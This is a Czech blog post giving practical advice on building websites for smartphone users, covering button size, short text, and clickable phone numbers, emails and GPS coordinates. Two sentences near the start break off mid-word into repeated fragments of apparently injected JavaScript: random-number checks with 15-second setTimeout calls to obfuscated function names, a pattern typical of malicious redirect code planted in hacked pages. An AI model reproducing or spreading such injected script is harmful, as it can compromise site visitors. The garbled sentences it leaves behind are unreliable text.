0

Web pro smartphone – omyly, fakta, souvislosti

Kategorie: Mobilní weby a vše okolo

Asi každý ví, že všechny weby mají omezenou „dobu živostnosti“. Je to doba, po kterou je web aktuální z hlediska designu a ovládacích prvků. Některé weby tak působí jako by byly vytvořeny za první republiky, což samozřejmě ubírá na důvěryhodnosti a konverze klesají. Obecně se říká, že doba aktuálnosti webu je přibližně 5 letandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}.

S nástupem chytrých telefonů ale vstoupil do hry další element. Web je sice krásný, nový, ale když na něj přijdu z telefonu, okamžitě jsem ztracen. Už tedy nestačí mít nový webandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}.

Už dříve jsme se bavili o responsive designu, dnes si ale povíme jak na mobilní weby z hlediska funkčnosti.

Mobilního uživatele poznáte na webu už z jeho chování – podívejte se, podle čeho.

 

Co je důležité:

– velikost ovládacích prvků:

Nikdo nechce klikat na titěrné šipečky, a panely v menu. Jistě, může si stránku zvětšit pouhým pohybem dvou prstů, ale věřte, že na třetí stránce to návštěvníka přestane bavit a znechuceně odejde.

 

– jasné a přehledné texty:

Komu by se chtělo na mobilu pročítat dlouhé eseje – chci produkt tady a teď a jestli mi ho neumíte nabídnout, jdu jinam.

 

– snadné čerpání dat z obsahu:

Máte responsive web? Fajn. Tak proč sakra když kliknu na telefonní číslo, nenabídne mi to možnost uložit jej do telefonu?!

A myslíte si, že když tu máte mapku ze seznamu, já si otevřu nové okno, tam si vás vyhledám, pak adresu zkopíruju do GPS a najdu vás? Proč tu nejsou gps souřadnice?

 

Stejná analogie funguje s emaily, nebo například IČO. Uživatelé mobilních zařízení by měli mít pohyb po stránkách maximálně zjednodušený a intuitivní, protože si nemohou dovolit ztrácet čas dalším vyhledáváním. A návštěvníci z klasických zařízení tyto bonusy jistě také ocení.

Tweet about this on TwitterShare on FacebookEmail this to someone
lospapunos@seznam.cz'

Komentáře

Loading Facebook Comments ...

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

six − 5 =